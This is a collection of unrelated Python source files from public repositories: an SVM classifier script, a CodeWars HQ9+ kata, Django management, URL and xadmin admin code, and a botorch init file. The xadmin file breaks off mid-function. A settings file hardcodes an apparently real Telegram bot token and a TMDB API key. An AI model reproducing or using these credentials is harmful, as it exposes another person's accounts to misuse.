87db130e21a172d48ce24cd1480dd27f518ba1f0 | 8313b823a755694cfd71e57ad63760ba1c7009d4 | /Classification/kernal_SVM.py | adcd73f8c99e84b0ddc56f69991b888dba8e9c20 | [] | no_license | KRBhavaniSankar/Machine-Learning | 49063374a8b243563212cf52a933da03b41bb576 | 339f146362aa5960794d8ddcef50d502955c24c4 | refs/heads/master | 2021-06-07T17:09:57.259971 | 2020-02-18T13:40:03 | 2020-02-18T13:40:03 | 143,809,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,638 | py | # Kernal-SVM Classification
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2, 3]].values
y = dataset.iloc[:, 4].values
# Splitting the dataset into the Training set and Test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Fitting classifier to the Training set
from sklearn.svm import SVC
classifier = SVC(kernel="rbf",random_state=0)
classifier.fit(X_train,y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# Visualising the Training set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_train, y_train
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Kernal-SVM Classifier (Training set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
# Visualising the Test set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_test, y_test
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Kernal-SVM Classifier (Test set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show() | [
"[email protected]"
] | |
5feaa7de4cb28d27aa5cf50cc0daa4d89a2fed56 | a590cb0c9b232ad98d17a9917a36930c6a2c03f8 | /8kyu/8kyu interpreters HQ9.py | b0236dc360274759dbaabb6e495a1fd40a998e01 | [] | no_license | AbbyGeek/CodeWars | 6e10c10cbdb11f2df17a657d11ff5ffa79a5fb0b | 64dddda9f2a14a0592cc946b35302c4bd9bc569e | refs/heads/master | 2020-12-21T00:14:53.665879 | 2020-01-26T01:16:41 | 2020-01-26T01:16:41 | 236,252,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,148 | py | def HQ9(code):
if "9" in code:
return "99 bottles of beer on the wall, 99 bottles of beer.\nTake one down and pass it around, 98 bottles of beer on the wall.\n98 bottles of beer on the wall, 98 bottles of beer.\nTake one down and pass it around, 97 bottles of beer on the wall.\n97 bottles of beer on the wall, 97 bottles of beer.\nTake one down and pass it around, 96 bottles of beer on the wall.\n96 bottles of beer on the wall, 96 bottles of beer.\nTake one down and pass it around, 95 bottles of beer on the wall.\n95 bottles of beer on the wall, 95 bottles of beer.\nTake one down and pass it around, 94 bottles of beer on the wall.\n94 bottles of beer on the wall, 94 bottles of beer.\nTake one down and pass it around, 93 bottles of beer on the wall.\n93 bottles of beer on the wall, 93 bottles of beer.\nTake one down and pass it around, 92 bottles of beer on the wall.\n92 bottles of beer on the wall, 92 bottles of beer.\nTake one down and pass it around, 91 bottles of beer on the wall.\n91 bottles of beer on the wall, 91 bottles of beer.\nTake one down and pass it around, 90 bottles of beer on the wall.\n90 bottles of beer on the wall, 90 bottles of beer.\nTake one down and pass it around, 89 bottles of beer on the wall.\n89 bottles of beer on the wall, 89 bottles of beer.\nTake one down and pass it around, 88 bottles of beer on the wall.\n88 bottles of beer on the wall, 88 bottles of beer.\nTake one down and pass it around, 87 bottles of beer on the wall.\n87 bottles of beer on the wall, 87 bottles of beer.\nTake one down and pass it around, 86 bottles of beer on the wall.\n86 bottles of beer on the wall, 86 bottles of beer.\nTake one down and pass it around, 85 bottles of beer on the wall.\n85 bottles of beer on the wall, 85 bottles of beer.\nTake one down and pass it around, 84 bottles of beer on the wall.\n84 bottles of beer on the wall, 84 bottles of beer.\nTake one down and pass it around, 83 bottles of beer on the wall.\n83 bottles of beer on the wall, 83 bottles of beer.\nTake one down and pass it around, 82 bottles of beer on the wall.\n82 bottles of beer on the wall, 82 bottles of beer.\nTake one down and pass it around, 81 bottles of beer on the wall.\n81 bottles of beer on the wall, 81 bottles of beer.\nTake one down and pass it around, 80 bottles of beer on the wall.\n80 bottles of beer on the wall, 80 bottles of beer.\nTake one down and pass it around, 79 bottles of beer on the wall.\n79 bottles of beer on the wall, 79 bottles of beer.\nTake one down and pass it around, 78 bottles of beer on the wall.\n78 bottles of beer on the wall, 78 bottles of beer.\nTake one down and pass it around, 77 bottles of beer on the wall.\n77 bottles of beer on the wall, 77 bottles of beer.\nTake one down and pass it around, 76 bottles of beer on the wall.\n76 bottles of beer on the wall, 76 bottles of beer.\nTake one down and pass it around, 75 bottles of beer on the wall.\n75 bottles of beer on the wall, 75 bottles of beer.\nTake one down and pass it around, 74 bottles of beer on the wall.\n74 bottles of beer on the wall, 74 bottles of beer.\nTake one down and pass it around, 73 bottles of beer on the wall.\n73 bottles of beer on the wall, 73 bottles of beer.\nTake one down and pass it around, 72 bottles of beer on the wall.\n72 bottles of beer on the wall, 72 bottles of beer.\nTake one down and pass it around, 71 bottles of beer on the wall.\n71 bottles of beer on the wall, 71 bottles of beer.\nTake one down and pass it around, 70 bottles of beer on the wall.\n70 bottles of beer on the wall, 70 bottles of beer.\nTake one down and pass it around, 69 bottles of beer on the wall.\n69 bottles of beer on the wall, 69 bottles of beer.\nTake one down and pass it around, 68 bottles of beer on the wall.\n68 bottles of beer on the wall, 68 bottles of beer.\nTake one down and pass it around, 67 bottles of beer on the wall.\n67 bottles of beer on the wall, 67 bottles of beer.\nTake one down and pass it around, 66 bottles of beer on the wall.\n66 bottles of beer on the wall, 66 bottles of beer.\nTake one down and pass it around, 65 bottles of beer on the wall.\n65 bottles of beer on the wall, 65 bottles of beer.\nTake one down and pass it around, 64 bottles of beer on the wall.\n64 bottles of beer on the wall, 64 bottles of beer.\nTake one down and pass it around, 63 bottles of beer on the wall.\n63 bottles of beer on the wall, 63 bottles of beer.\nTake one down and pass it around, 62 bottles of beer on the wall.\n62 bottles of beer on the wall, 62 bottles of beer.\nTake one down and pass it around, 61 bottles of beer on the wall.\n61 bottles of beer on the wall, 61 bottles of beer.\nTake one down and pass it around, 60 bottles of beer on the wall.\n60 bottles of beer on the wall, 60 bottles of beer.\nTake one down and pass it around, 59 bottles of beer on the wall.\n59 bottles of beer on the wall, 59 bottles of beer.\nTake one down and pass it around, 58 bottles of beer on the wall.\n58 bottles of beer on the wall, 58 bottles of beer.\nTake one down and pass it around, 57 bottles of beer on the wall.\n57 bottles of beer on the wall, 57 bottles of beer.\nTake one down and pass it around, 56 bottles of beer on the wall.\n56 bottles of beer on the wall, 56 bottles of beer.\nTake one down and pass it around, 55 bottles of beer on the wall.\n55 bottles of beer on the wall, 55 bottles of beer.\nTake one down and pass it around, 54 bottles of beer on the wall.\n54 bottles of beer on the wall, 54 bottles of beer.\nTake one down and pass it around, 53 bottles of beer on the wall.\n53 bottles of beer on the wall, 53 bottles of beer.\nTake one down and pass it around, 52 bottles of beer on the wall.\n52 bottles of beer on the wall, 52 bottles of beer.\nTake one down and pass it around, 51 bottles of beer on the wall.\n51 bottles of beer on the wall, 51 bottles of beer.\nTake one down and pass it around, 50 bottles of beer on the wall.\n50 bottles of beer on the wall, 50 bottles of beer.\nTake one down and pass it around, 49 bottles of beer on the wall.\n49 bottles of beer on the wall, 49 bottles of beer.\nTake one down and pass it around, 48 bottles of beer on the wall.\n48 bottles of beer on the wall, 48 bottles of beer.\nTake one down and pass it around, 47 bottles of beer on the wall.\n47 bottles of beer on the wall, 47 bottles of beer.\nTake one down and pass it around, 46 bottles of beer on the wall.\n46 bottles of beer on the wall, 46 bottles of beer.\nTake one down and pass it around, 45 bottles of beer on the wall.\n45 bottles of beer on the wall, 45 bottles of beer.\nTake one down and pass it around, 44 bottles of beer on the wall.\n44 bottles of beer on the wall, 44 bottles of beer.\nTake one down and pass it around, 43 bottles of beer on the wall.\n43 bottles of beer on the wall, 43 bottles of beer.\nTake one down and pass it around, 42 bottles of beer on the wall.\n42 bottles of beer on the wall, 42 bottles of beer.\nTake one down and pass it around, 41 bottles of beer on the wall.\n41 bottles of beer on the wall, 41 bottles of beer.\nTake one down and pass it around, 40 bottles of beer on the wall.\n40 bottles of beer on the wall, 40 bottles of beer.\nTake one down and pass it around, 39 bottles of beer on the wall.\n39 bottles of beer on the wall, 39 bottles of beer.\nTake one down and pass it around, 38 bottles of beer on the wall.\n38 bottles of beer on the wall, 38 bottles of beer.\nTake one down and pass it around, 37 bottles of beer on the wall.\n37 bottles of beer on the wall, 37 bottles of beer.\nTake one down and pass it around, 36 bottles of beer on the wall.\n36 bottles of beer on the wall, 36 bottles of beer.\nTake one down and pass it around, 35 bottles of beer on the wall.\n35 bottles of beer on the wall, 35 bottles of beer.\nTake one down and pass it around, 34 bottles of beer on the wall.\n34 bottles of beer on the wall, 34 bottles of beer.\nTake one down and pass it around, 33 bottles of beer on the wall.\n33 bottles of beer on the wall, 33 bottles of beer.\nTake one down and pass it around, 32 bottles of beer on the wall.\n32 bottles of beer on the wall, 32 bottles of beer.\nTake one down and pass it around, 31 bottles of beer on the wall.\n31 bottles of beer on the wall, 31 bottles of beer.\nTake one down and pass it around, 30 bottles of beer on the wall.\n30 bottles of beer on the wall, 30 bottles of beer.\nTake one down and pass it around, 29 bottles of beer on the wall.\n29 bottles of beer on the wall, 29 bottles of beer.\nTake one down and pass it around, 28 bottles of beer on the wall.\n28 bottles of beer on the wall, 28 bottles of beer.\nTake one down and pass it around, 27 bottles of beer on the wall.\n27 bottles of beer on the wall, 27 bottles of beer.\nTake one down and pass it around, 26 bottles of beer on the wall.\n26 bottles of beer on the wall, 26 bottles of beer.\nTake one down and pass it around, 25 bottles of beer on the wall.\n25 bottles of beer on the wall, 25 bottles of beer.\nTake one down and pass it around, 24 bottles of beer on the wall.\n24 bottles of beer on the wall, 24 bottles of beer.\nTake one down and pass it around, 23 bottles of beer on the wall.\n23 bottles of beer on the wall, 23 bottles of beer.\nTake one down and pass it around, 22 bottles of beer on the wall.\n22 bottles of beer on the wall, 22 bottles of beer.\nTake one down and pass it around, 21 bottles of beer on the wall.\n21 bottles of beer on the wall, 21 bottles of beer.\nTake one down and pass it around, 20 bottles of beer on the wall.\n20 bottles of beer on the wall, 20 bottles of beer.\nTake one down and pass it around, 19 bottles of beer on the wall.\n19 bottles of beer on the wall, 19 bottles of beer.\nTake one down and pass it around, 18 bottles of beer on the wall.\n18 bottles of beer on the wall, 18 bottles of beer.\nTake one down and pass it around, 17 bottles of beer on the wall.\n17 bottles of beer on the wall, 17 bottles of beer.\nTake one down and pass it around, 16 bottles of beer on the wall.\n16 bottles of beer on the wall, 16 bottles of beer.\nTake one down and pass it around, 15 bottles of beer on the wall.\n15 bottles of beer on the wall, 15 bottles of beer.\nTake one down and pass it around, 14 bottles of beer on the wall.\n14 bottles of beer on the wall, 14 bottles of beer.\nTake one down and pass it around, 13 bottles of beer on the wall.\n13 bottles of beer on the wall, 13 bottles of beer.\nTake one down and pass it around, 12 bottles of beer on the wall.\n12 bottles of beer on the wall, 12 bottles of beer.\nTake one down and pass it around, 11 bottles of beer on the wall.\n11 bottles of beer on the wall, 11 bottles of beer.\nTake one down and pass it around, 10 bottles of beer on the wall.\n10 bottles of beer on the wall, 10 bottles of beer.\nTake one down and pass it around, 9 bottles of beer on the wall.\n9 bottles of beer on the wall, 9 bottles of beer.\nTake one down and pass it around, 8 bottles of beer on the wall.\n8 bottles of beer on the wall, 8 bottles of beer.\nTake one down and pass it around, 7 bottles of beer on the wall.\n7 bottles of beer on the wall, 7 bottles of beer.\nTake one down and pass it around, 6 bottles of beer on the wall.\n6 bottles of beer on the wall, 6 bottles of beer.\nTake one down and pass it around, 5 bottles of beer on the wall.\n5 bottles of beer on the wall, 5 bottles of beer.\nTake one down and pass it around, 4 bottles of beer on the wall.\n4 bottles of beer on the wall, 4 bottles of beer.\nTake one down and pass it around, 3 bottles of beer on the wall.\n3 bottles of beer on the wall, 3 bottles of beer.\nTake one down and pass it around, 2 bottles of beer on the wall.\n2 bottles of beer on the wall, 2 bottles of beer.\nTake one down and pass it around, 1 bottle of beer on the wall.\n1 bottle of beer on the wall, 1 bottle of beer.\nTake one down and pass it around, no more bottles of beer on the wall.\nNo more bottles of beer on the wall, no more bottles of beer.\nGo to the store and buy some more, 99 bottles of beer on the wall."
if "H" in code:
return "Hello World!"
if "Q" in code:
return code
else: return None | [
"[email protected]"
] | |
0dad5e1d305a873fa56187c074313e2abafcd989 | a57a79bd2cb2397c6d879751e7041e9142390acc | /apps/tags/management/commands/migrate_tags.py | ba82af97368ac66dbcffd52844782f5c57617454 | [] | no_license | cephey/country | b41e85bfd5df20caec5d6f54b409ffe4f1b11ac3 | 774800e79417122876119246bb5b6e9b2e186891 | refs/heads/master | 2021-01-22T23:15:46.934125 | 2017-09-10T21:53:16 | 2017-09-10T21:53:16 | 85,618,298 | 0 | 0 | null | 2017-05-11T11:34:16 | 2017-03-20T19:36:45 | Python | UTF-8 | Python | false | false | 911 | py | import csv
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from apps.tags.models import Tag
class Command(BaseCommand):
help = 'Migrate tags from csv'
def add_arguments(self, parser):
parser.add_argument('--path', help='/path/to/file.csv')
def handle(self, *args, **kwargs):
self.stdout.write('Start...')
path = kwargs.get('path')
if not path:
raise CommandError('Path is required')
with open(path, 'r', encoding=settings.MIGRATE_FILE_ENCODING) as csvfile:
reader = csv.reader(csvfile)
tags = []
for row in reader:
tags.append(
Tag(
name=row[7], ext_id=row[0]
)
)
Tag.objects.bulk_create(tags, batch_size=100)
self.stdout.write('End...')
| [
"[email protected]"
] | |
65f5d2a5f15722582ddbc314d4a85e0b2b534645 | 99ea33e3b36d3da52d3817c28fd60696e4d36c91 | /config/settings.py | e7d355059e8274925475bf1ab8ef560a7afa450e | [] | no_license | ghostnoop/WhatToWatch-ml-telegram | 2628c97a62f24ac149f540386d0d14a2091d97d9 | da7bb1386dab789641d9245544e89cf5d983fb50 | refs/heads/main | 2023-03-09T07:15:15.707105 | 2021-02-22T19:00:13 | 2021-02-22T19:00:13 | 341,305,969 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | import tmdbsimple as tmdb
class BotSettings:
API_TOKEN = "1083477387:AAHtlo1ngC61ZFA8rVadPut15CUjX92h79U"
ADMIN_ID = 153621836
tmdb.API_KEY = 'ad11be6ccbdb27f9a1f4530c5848891f'
| [
"[email protected]"
] | |
ed4170fd87c23a603adf961d9030d73d0b004cf1 | 2b1448085c5ad44e78772dde1dcc2fae9cc4c3cc | /botorch/sampling/__init__.py | d27b244ea432efe02fe8a14dadd028d62b99e381 | [
"MIT"
] | permissive | leelasd/botorch | 47fa0ff9c5f6c534ecfcba59f5b1bf52eea0d62e | c48bfc822940ee8a6e5e2604d4ff282033dbe892 | refs/heads/master | 2022-12-17T04:42:41.591444 | 2020-09-10T23:45:05 | 2020-09-10T23:46:41 | 294,561,185 | 1 | 0 | MIT | 2020-09-11T01:19:36 | 2020-09-11T01:19:35 | null | UTF-8 | Python | false | false | 806 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from botorch.sampling.pairwise_samplers import (
PairwiseIIDNormalSampler,
PairwiseMCSampler,
PairwiseSobolQMCNormalSampler,
)
from botorch.sampling.qmc import MultivariateNormalQMCEngine, NormalQMCEngine
from botorch.sampling.samplers import IIDNormalSampler, MCSampler, SobolQMCNormalSampler
from torch.quasirandom import SobolEngine
__all__ = [
"IIDNormalSampler",
"MCSampler",
"MultivariateNormalQMCEngine",
"NormalQMCEngine",
"SobolEngine",
"SobolQMCNormalSampler",
"PairwiseIIDNormalSampler",
"PairwiseMCSampler",
"PairwiseSobolQMCNormalSampler",
]
| [
"[email protected]"
] | |
884dd2e27584897fc76bd41c4be519872d0ebcf0 | 07a42b46fe9f154c32c1cfe4e7ef878d5c653ae7 | /simple_skeleton/urls.py | 9d3acfd8f816549f4662656cda55eb48a7def3ea | [
"MIT"
] | permissive | Mamacitapunto/simple-django-skeleton | 0d2fe60616a2df7829f1fdf05b57754f464d6e9f | 0babb4aa6bfcf6b9a803caed3a4167cbf4d9113f | refs/heads/master | 2021-01-19T04:25:03.444748 | 2015-11-30T20:16:02 | 2015-11-30T20:16:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | from django.conf.urls import include, url
from django.contrib import admin
from simple_skeleton.apps.core import views as core_views
urlpatterns = [
url(r'^$', core_views.home, name='home'),
url(r'^admin/', include(admin.site.urls)),
]
| [
"[email protected]"
] | |
46b616bb437858d13cdcf1b05ea6e7262bb7899c | 0a530e71f248f0f731c6a3f28f090d1bb26b55e3 | /apps/testdatas/adminx.py | 4b18c25724826878478f7f85cf1f487e75812bb2 | [] | no_license | wawj901124/fuwuqi | cca9935f7b110dfdf38c93d59602a596ecac0d58 | e388fd10cf4fdb889d6566b7a30702b7c7351750 | refs/heads/master | 2022-12-13T13:12:10.854319 | 2020-01-18T00:42:52 | 2020-01-18T00:42:52 | 209,901,486 | 0 | 0 | null | 2022-11-22T02:40:33 | 2019-09-21T00:23:51 | Python | UTF-8 | Python | false | false | 63,303 | py | import xadmin
from .models import ClickAndBack,User,NewAddAndCheck,SearchAndCheck,DeleteAndCheck,EditAndCheck
from .models import InputTapInputText,InputTapInputFile,InputTapInputDateTime,SelectTapSelectOption,AssertTipText
from .models import IframeBodyInputText
from .models import RadioAndReelectionLabel
from .models import SearchInputTapInputText,SearchSelectTapSelectOption
from .models import LoginAndCheck
class LoginAndCheckXadmin(object):
all_zi_duan = ["id", "test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
"login_url",
"is_auto_input_code","code_image_xpath",
"code_type","code_input_ele_find",
"code_input_ele_find_value",
"login_button_ele_find",
"login_button_ele_find_value","click_login_button_delay_time",
"case_counts", "write_user",
"add_time", "update_time"]
list_display = ["test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
"login_url",
"is_auto_input_code", "code_image_xpath",
"code_type", "code_input_ele_find",
"code_input_ele_find_value",
"login_button_ele_find",
"login_button_ele_find_value", "click_login_button_delay_time",
"case_counts",
"go_to"] # 定义显示的字段
list_filter = ["test_project", "test_module", "test_page",
"test_case_title", "is_run_case",
"write_user"] # 定义筛选的字段
search_fields = ["test_project", "test_module", "test_page",
"test_case_title"] # 定义搜索字段
model_icon = "fa fa-file-text" # 定义图标显示
ordering = ["-add_time"] # 添加默认排序规则显示排序,根据添加时间倒序排序
readonly_fields = ["write_user", "add_time",
"update_time"] # 设置某些字段为只为可读 #设置了readonly_fields,再设置exclude,exclude对该字段无效,
# exclude = ['case_step'] # 设置某些字段为不显示,即隐藏 #readonly_fields和exclude设置会有冲突
# inlines = [TestCaseInline] # inlines配和TestCaseInline使用,可以直接在项目页面添加测试用例#只能做一层嵌套,不能进行两层嵌套
list_editable = all_zi_duan # 可以在列表页对字段进行编辑
refresh_times = [3, 5] # 对列表页进行定时刷新,配置了3秒和5秒,可以从中选择一个
list_per_page = 50 # 每页设置50条数据,默认每页展示100条数据
# fk_fields = ['test_project_id',] #设置显示外键字段,未生效
list_display_links = ["test_case_title", ] # 设置点击链接进入编辑页面的字段
# date_hierarchy = 'add_time' #详细时间分层筛选,未生效
show_detail_fields = ["test_project", ] # 显示数据详情
list_export = ('xls',) # 控制列表页导出数据的可选格式
show_bookmarks = True # 控制是否显示书签功能
# 设置是否加入导入插件
import_excel = True # True表示显示使用插件,False表示不显示使用插件,该import_excel变量会覆盖插件中的变量
#设置内联
class InputTapInputTextInline(object):
model = InputTapInputText
exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class AssertTipTextInline(object):
model = AssertTipText
exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
extra = 1
style = 'tab' #以标签形式展示
inlines = [InputTapInputTextInline,AssertTipTextInline,]
def save_models(self): # 重载save_models的方法,可以在做了某个动作后,动态重新加载
obj = self.new_obj # 取得当前用例的实例
if self.request.user.is_superuser: # 超级用户则不对编写人做修改
obj.save() # 保存当前用例
else: # 非超级用户会自动保存编写人
user = User.objects.get(username=self.request.user)
obj.write_user_id = user.id # 保存当前的write_user为用户登录的user
obj.save() # 保存当前用例
def queryset(self): # 重载queryset方法,用来做到不同的admin取出的数据不同
qs = super(LoginAndCheckXadmin, self).queryset() # 调用父类
if self.request.user.is_superuser: # 超级用户可查看所有数据
return qs
else:
qs = qs.filter(write_user=self.request.user) # 否则只显示本用户数据
return qs # 返回qs
def post(self, request, *args, **kwargs): # 重载post函数,用于判断导入的逻辑
if 'excel' in request.FILES: # 如果excel在request.FILES中
excel_file = request.FILES.get('excel', '')
import xlrd # 导入xlrd
# 常用的Excel文件有.xls和.xls两种,.xls文件读取时需要设置formatting_info = True
# data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx文件
exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
formatting_info=True) # xls文件
from .analyzexls import Analyzexls
analyzexls = Analyzexls()
# 将获取的数据循环导入数据库中
all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
i = 0
if len(all_list_1[0]) == 17:
while i < len(all_list_1):
newaddandcheck = NewAddAndCheck() # 数据库的对象等于ClickAndBack,实例化
newaddandcheck.test_project = all_list_1[i][0] # 填写项目all_list_1[i][j]
newaddandcheck.test_module = all_list_1[i][1] # 填写模块
newaddandcheck.test_page = all_list_1[i][2] # 填写测试页
if all_list_1[i][3] == u"冒烟用例":
newaddandcheck.case_priority = "P0" # 填写用例优先级
elif all_list_1[i][3] == u"系统的重要功能用例":
newaddandcheck.case_priority = "P1" # 填写用例优先级
elif all_list_1[i][3] == u"系统的一般功能用例":
newaddandcheck.case_priority = "P2" # 填写用例优先级
elif all_list_1[i][3] == u"极低级别的用例":
newaddandcheck.case_priority = "P3" # 填写用例优先级
newaddandcheck.test_case_title = all_list_1[i][4] # 填写测试内容的名称
newaddandcheck.is_run_case =all_list_1[i][5] # 填写是否运行
newaddandcheck.login_url = all_list_1[i][6] # 填写登录页的url
newaddandcheck.is_auto_input_code = all_list_1[i][7] # 填写是否自动输入验证码
newaddandcheck.code_image_xpath =all_list_1[i][8] # 填写验证码xpath路径
newaddandcheck.code_type = all_list_1[i][9] # 填写验证码类型
newaddandcheck.code_input_ele_find =all_list_1[i][10] # 填写验证码输入框查找风格
newaddandcheck.code_input_ele_find_value = all_list_1[i][11] # 填写验证码输入框查找风格的确切值
newaddandcheck.login_button_ele_find = all_list_1[i][12] # 填写确定按钮查找风格的确切值
newaddandcheck.login_button_ele_find_value = all_list_1[i][13] # 填写是否点击取消按钮
newaddandcheck.click_login_button_delay_time = all_list_1[i][14] # 填写取消按钮查找风格
newaddandcheck.case_counts = all_list_1[i][15] # 填写case_counts
if all_list_1[i][16] != None: # 如果编写人列有数据则填写编写人
users = User.objects.all()
for user in users:
if user.username == all_list_1[i][16]:
newaddandcheck.write_user_id = user.id # 填写编写人
newaddandcheck.save() # 保存到数据库
i = i + 1
pass
return super(LoginAndCheckXadmin,self).post(request,*args,**kwargs) # 必须调用clickandbackAdmin父类,再调用post方法,否则会报错
# 一定不要忘记,否则整个ClickAndBackXAdmin保存都会出错
class ClickAndBackXAdmin(object):
all_zi_duan = ["id","test_project","test_module","test_page",
"test_case_title","is_run_case",
"is_static_load_page_time",
"current_page_click_ele_find","current_page_click_ele_find_value",
"is_new",
"next_page_check_ele_find","next_page_check_ele_find_value",
"case_counts","depend_case","write_user",
"add_time","update_time"]
list_display = ["test_project","test_module","test_page",
"test_case_title","is_run_case",
"is_static_load_page_time",
"current_page_click_ele_find","current_page_click_ele_find_value",
"is_new",
"next_page_check_ele_find","next_page_check_ele_find_value",
"case_counts","depend_case",
"go_to"] #定义显示的字段
list_filter = ["test_project","test_module","test_page",
"test_case_title","is_run_case","is_new",
"write_user"] #定义筛选的字段
search_fields = ["test_project", "test_module", "test_page",
"test_case_title"] #定义搜索字段
model_icon = "fa fa-file-text" # 定义图标显示
ordering = ["-add_time"] # 添加默认排序规则显示排序,根据添加时间倒序排序
readonly_fields = ["write_user","add_time","update_time"] # 设置某些字段为只为可读 #设置了readonly_fields,再设置exclude,exclude对该字段无效,
# exclude = ['case_step'] # 设置某些字段为不显示,即隐藏 #readonly_fields和exclude设置会有冲突
# inlines = [TestCaseInline] # inlines配和TestCaseInline使用,可以直接在项目页面添加测试用例#只能做一层嵌套,不能进行两层嵌套
list_editable = all_zi_duan # 可以在列表页对字段进行编辑
refresh_times = [3, 5] # 对列表页进行定时刷新,配置了3秒和5秒,可以从中选择一个
list_per_page = 50 #每页设置50条数据,默认每页展示100条数据
# fk_fields = ['test_project_id',] #设置显示外键字段,未生效
list_display_links = ["test_case_title",] #设置点击链接进入编辑页面的字段
# date_hierarchy = 'add_time' #详细时间分层筛选,未生效
show_detail_fields = ["test_project",] #显示数据详情
list_export = ('xls',) #控制列表页导出数据的可选格式
show_bookmarks = True #控制是否显示书签功能
#设置是否加入导入插件
import_excel = True #True表示显示使用插件,False表示不显示使用插件,该import_excel变量会覆盖插件中的变量
#重载get_context方法,只显示本用户添加的点击场景的用例
def get_context(self):
context = super(ClickAndBackXAdmin, self).get_context() #调用父类
if 'form' in context: #固定写法
if self.request.user.is_superuser: # 超级用户则返回所有
context['form'].fields['depend_case'].queryset = ClickAndBack.objects.all()
else: # 非超级用户则只返回本用户添加的点击场景的用例
context['form'].fields['depend_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user) #取form中的depend_click_case(与model中的字段相同),只取当前用户填写的数据
return context
def save_models(self): #重载save_models的方法,可以在做了某个动作后,动态重新加载
obj = self.new_obj #取得当前用例的实例
if self.request.user.is_superuser: # 超级用户则不对编写人做修改
obj.save() # 保存当前用例
else: #非超级用户会自动保存编写人
user = User.objects.get(username=self.request.user)
obj.write_user_id = user.id #保存当前的write_user为用户登录的user
obj.save() #保存当前用例
def queryset(self): #重载queryset方法,用来做到不同的admin取出的数据不同
qs = super(ClickAndBackXAdmin, self).queryset() #调用父类
if self.request.user.is_superuser: #超级用户可查看所有数据
return qs
else:
qs = qs.filter(write_user=self.request.user) #否则只显示本用户数据
return qs #返回qs
def post(self,request, *args,**kwargs): #重载post函数,用于判断导入的逻辑
if 'excel' in request.FILES: #如果excel在request.FILES中
excel_file = request.FILES.get('excel', '')
import xlrd #导入xlrd
#常用的Excel文件有.xls和.xls两种,.xls文件读取时需要设置formatting_info = True
# data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx文件
exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(), formatting_info=True) # xls文件
from .analyzexls import Analyzexls
analyzexls = Analyzexls()
#将获取的数据循环导入数据库中
all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
i = 0
if len(all_list_1[0]) == 14:
while i < len(all_list_1):
clickandback = ClickAndBack() # 数据库的对象等于ClickAndBack,实例化
clickandback.test_project = all_list_1[i][0] # 填写项目all_list_1[i][j]
clickandback.test_module = all_list_1[i][1] # 填写模块
clickandback.test_page = all_list_1[i][2] # 填写测试页
clickandback.test_case_title = all_list_1[i][3] # 填写测试内容的名称
clickandback.is_run_case = all_list_1[i][4] # 填写是否运行
clickandback.is_static_load_page_time = all_list_1[i][5] # 填写是否统计页面加载时间
# if all_list_1[i][4] == "TRUE":
# clickandback.is_run_case = 1 # 填写是否运行
# elif all_list_1[i][4] == "FALSE":
# clickandback.is_run_case = 0 # 填写是否运行
clickandback.current_page_click_ele_find = all_list_1[i][6] # 填写当前页面要点击元素查找风格
clickandback.current_page_click_ele_find_value = all_list_1[i][7] # 填写当前页面要点击元素查找风格的确切值
clickandback.is_new = all_list_1[i][8] # 填写是否新窗口
# if all_list_1[i][7] == "TRUE":
# clickandback.is_new = 1 # 填写是否新窗口
# elif all_list_1[i][7] == "FALSE":
# clickandback.is_new = 0 # 填写是否新窗口
clickandback.next_page_check_ele_find = all_list_1[i][8] # 填写next_page_check_ele_find
clickandback.next_page_check_ele_find_value = all_list_1[i][10] # 填写next_page_check_ele_find_value
